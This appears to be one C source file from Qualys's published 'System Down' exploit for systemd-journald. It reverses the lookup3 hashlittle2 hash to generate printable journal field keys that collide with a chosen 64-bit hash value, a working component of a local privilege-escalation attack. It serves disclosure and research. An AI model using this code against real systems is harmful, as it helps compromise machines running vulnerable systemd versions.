/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#include "journal-util.h"
#include "lookup3.h"
#include "macro.h"
#include "reverse.h"

#define rot(x,k) (((x)<<(k)) | ((x)>>(32-(k))))

#define reverse_final(a,b,c) \
{ \
  c += rot(b,24); c ^= b; \
  b += rot(a,14); b ^= a; \
  a += rot(c,4);  a ^= c; \
  c += rot(b,16); c ^= b; \
  b += rot(a,25); b ^= a; \
  a += rot(c,11); a ^= c; \
  c += rot(b,14); c ^= b; \
}

#define reverse_mix(a,b,c) \
{ \
  b -= a;  c ^= rot(b, 4);  c += b; \
  a -= c;  b ^= rot(a,19);  b += a; \
  c -= b;  a ^= rot(c,16);  a += c; \
  b -= a;  c ^= rot(b, 8);  c += b; \
  a -= c;  b ^= rot(a, 6);  b += a; \
  c -= b;  a ^= rot(c, 4);  a += c; \
}

#define random32() ((uint32_t)random() ^ ((uint32_t)random() << 16))

#define random32_graph() ({ \
    static const uint8_t _graph_[64] = \
        "0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"; \
    const uint32_t _i_ = random32(); \
    const uint32_t _r_ = \
        ((uint32_t)_graph_[(_i_ >> 24) % sizeof(_graph_)] << 24) | \
        ((uint32_t)_graph_[(_i_ >> 16) % sizeof(_graph_)] << 16) | \
        ((uint32_t)_graph_[(_i_ >>  8) % sizeof(_graph_)] <<  8) | \
        ((uint32_t)_graph_[(_i_ >>  0) % sizeof(_graph_)] <<  0); \
    _r_; \
})

static bool
reverse_hashlittle2(uint32_t c, uint32_t b, char * const key, const size_t key_size)
{
    if (!key) die();
    if (key_size % 12) die();
    if (key_size < 12) die();
    const uint32_t deadbeef = (uint32_t)0xdeadbeef + (uint32_t)key_size;

    uint32_t a = random32();
    reverse_final(a,b,c);

    size_t length;
    for (length = key_size; length >= 12; length -= 12) {
        uint32_t * const k = (void *)(key + length - 12);
        if (length < key_size) {
            reverse_mix(a,b,c);
        }
        if (length > 12) {
            k[0] = random32_graph();
            k[1] = random32_graph();
            k[2] = random32_graph();
        } else {
            k[0] = a - deadbeef;
            k[1] = b - deadbeef;
            k[2] = c - deadbeef;
        }
        size_t i;
        for (i = 0; i < 12; i++) {
            if (!isgraph(((const unsigned char *)k)[i])) {
                if (length > 12) die();
                return false;
            }
        }
        a -= k[0];
        b -= k[1];
        c -= k[2];
    }
    if (length != 0) die();
    if (a != deadbeef) die();
    if (b != deadbeef) die();
    if (c != deadbeef) die();

    const char * const q = memchr(key, '=', key_size);
    return (q && journal_field_valid(key, q - key, false));
}

void
reverse_hash64(const uint64_t hash, char * const data, const size_t size)
{
    static char key[12];
    if (size <= sizeof(key)) die();
    if (!data) die();

    const uint32_t c = hash >> 32;
    const uint32_t b = hash;

    uint32_t try;
    for (try = 1; ; try++) {
        if (!try) die();
        if (reverse_hashlittle2(c, b, key, sizeof(key))) break;
    }
    if (hash64(key, sizeof(key)) != hash) die();

    memcpy(data, key, sizeof(key));
    data[sizeof(key)] = '\0';
}

